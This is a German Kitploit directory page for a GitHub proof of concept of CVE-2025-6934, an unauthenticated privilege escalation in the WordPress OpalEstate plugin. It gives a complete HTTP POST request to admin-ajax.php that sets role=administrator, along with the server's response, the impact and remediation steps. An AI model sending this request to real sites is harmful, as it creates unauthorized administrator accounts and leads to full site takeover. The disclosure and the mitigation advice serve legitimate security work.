Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-6934 — CVE-2025-6934 PoC | Kitploit
Tools/GitHubGitHub/mrjhaxcore/cve-2025-6934
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmrjhaxcore/cve-2025-6934

CVE-2025-6934

CVE-2025-6934 PoC

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 WordPress OpalEstate Plugin - Nicht authentifizierte Privilegieneskalations-Schwachstelle

🔎 Beschreibung

Das OpalEstate-Plugin für WordPress enthält eine kritische Schwachstelle im AJAX-Registrierungs-Handler, die es nicht authentifizierten Benutzern ermöglicht, sich als Administratoren zu registrieren.

Das Problem liegt in der unsicheren Handhabung des role-Parameters in der AJAX-Aktion opalestate_register_form, die über admin-ajax.php öffentlich zugänglich ist. Ein Angreifer mit einem gültigen Nonce kann seine Privilegien erweitern, indem er einfach das Feld role=administrator sendet, was zu einer vollständigen Kompromittierung der Website führt.

CVE ID: CVE-2025-6934 CVSS-Score: 9.8 (Kritisch) Veröffentlicht: 30. Juni 2025

📋 Angreifbarer Endpunkt/ POC

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 231 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99" sec-ch-ua-mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/wordpress/?page_id=16 Accept-Encoding: gzip, deflate, br Cookie: wp-settings-time-1=1750938057; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; kawuda_cookie=1751024383267404614; PHPSESSID=rsbi6r8gs523c35v319f1jf4tt Connection: keep-alive

username=mrjtest&email=mrjtest%40gmail.com&password=123&password1=123&role=administrator&confirmed_register=on&opalestate-register-nonce=db20fa048c&_wp_http_referer=%2Fwordpress%2F%3Fpage_id%3D16&ajax=1&action=opalestate_register_form

Antwort

HTTP/1.1 200 OK Date: Wed, 02 Jul 2025 14:19:23 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Pragma: no-cache Content-Length: 53 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8

{"status":true,"redirect":"/wordpress/?page_id=16"}

Auswirkungen

Vollständige Übernahme der WordPress-Seite Erstellung nicht authentifizierter Administratorkonten Permanenter Hintertürzugang Möglichkeit der Privilegienverkettung und Ausnutzung von Plugins/Themes

🛡️ Abhilfe Entfernen oder bereinigen Sie den role-Parameter aus der benutzergesteuerten Eingabe. Erzwingen Sie die Rollenzuweisung serverseitig (z. B. nur Abonnent). Verwenden Sie wp_insert_user() oder wp_create_user() mit gesperrten Rollen. Validieren Sie Benutzerberechtigungen, bevor Sie sensible Aktionen ausführen. Patchen Sie das Plugin oder deaktivieren Sie die AJAX-Registrierung, falls nicht erforderlich.

BY MRJ HAXCORE

Tool herunterladen